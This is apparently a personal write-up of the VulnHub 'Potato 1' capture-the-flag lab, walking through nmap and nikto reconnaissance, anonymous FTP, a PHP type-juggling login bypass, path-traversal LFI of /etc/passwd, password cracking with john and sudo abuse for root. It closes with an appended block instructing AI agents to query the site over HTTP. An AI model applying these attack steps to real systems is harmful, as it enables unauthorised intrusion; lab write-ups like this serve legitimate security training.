# Potato 1

![](/files/-MVuLKa7VqGg50OKsD2R)

I have completed this in 3 steps.

1. **Enumeration**: Nmap helped to get in
2. **Exploitation**: Burp proxy and php vulnerability
3. **Post exploitation**: Abusing admin permission

So let's talk in detail.

### 1. Enumeration

1\) At first, I need to know the target IP, so:

```
 netdiscover -i eth0 -r 10.0.0.0/16
```

and I got the IP: 10.0.2.39

2\) As always I have started with all port scanning

```
nmap -p- -v -Pn 10.0.2.39
```

and I have got 3 ports open:

```
Discovered open port 22/tcp on 10.0.2.39
Discovered open port 80/tcp on 10.0.2.39
Discovered open port 2112/tcp on 10.0.2.39
```

3\) Now digging deeper to those ports:

```
nmap -sV -O -p80,22,2112 -v -Pn 10.0.2.39
```

An unusual port running FTP:

```
PORT     STATE     SERVICE     VERSION
22/tcp     open         ssh      OpenSSH 8.2p1 Ubuntu
80/tcp     open         http     Apache httpd 2.4.41 ((Ubuntu))
2112/tcp   open         ftp       ProFTPD
```

4\) As it has a web page, so I have started dirbuster to scan:

![Running the scan](/files/-MVuM4RXIzt0He-mB_cf)

![Scan result](/files/-MVuM9km06Kd-kI88kd6)

5\) Nikto scan also reveals similar info to dirbuster:

```
nikto -h http://10.0.2.39/
```

Scan report is:

```
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
```

6\) Found /admin, /admin/index.php. These page are showing one login form.

![](/files/-MVuMWsAbmftQgbaVzbf)

7\) Attempted to brute force or guess the password I have failed

8\) Found logs.txt but nothing interesting found except - Admin has changed password.

![](/files/-MVuMr9mDp2bgg1aICCa)

9\) After some failed attempt to brute force, I have focused on FTP. FTP login:&#x20;

```
ftp -p 10.0.2.39 2112
```

I have found:\
&#x20;\- anonymous login allowed\
&#x20;\- found 2 interesting files

```
-rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg
```

downloaded those files:

```
 get index.php.bak
```

### 2. Exploitation

10\) From index.php.bak, I can see the source code:

![](/files/-MVuPkRnytwct2nMxGDB)

11\) I have tried SQL injection but failed. After some research, I have found this article about - [type juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf). It helps!

12\) Successfully exploited this vulnerability. I have used - password\[]=""

![](/files/-MVuPxxjACX2N1sC7j8u)

13\) Result:&#x20;

![](/files/-MVuQ3lwt3jZhGqmN7yT)

14\) But I am facing access denied message:

![](/files/-MVuQ9GMigrk4qIvgakq)

15\) Other pages don't have any interesting this except the Logs. I have intercepted all the request with Burp. And I have found an interesting entry in logs. This will probably lead to LFI.

![](/files/-MVuQH7002gUzxnUesqb)

16\) I have tried *file=../../../../../etc/passwd*

![](/files/-MVuQUigPmu4X61_Qh3e)

17\) got = webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6. Here I have used john the ripper and I have got:&#x20;

1. user: webadmin&#x20;
2. pass: dragon

18\) Now login to ssh&#x20;

```
ssh webadmin@10.0.2.39
```

and eventually I have found the user flag

![](/files/-MVuQpKQ8xd69ErsGVxG)

### 3. Post Exploitation

19\) Now I need root access. I have searched for another profile then webadmine's privilege

![](/files/-MVuRCNwNh1wfv-IqG9Y)

20\) Here, webadmin cat execute /notes and anything after it. That's the key point! I have created a small shell and executed it.

![](/files/-MVuRNEWacaRtgnx6ctY)

21\) Finally I have got root flag in /root/root.txt&#x20;

> bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==

Hope this write up will help you. Any feedback is appreciated


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://meowsec.gitbook.io/vulnhub/easy-1/list1/potato-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.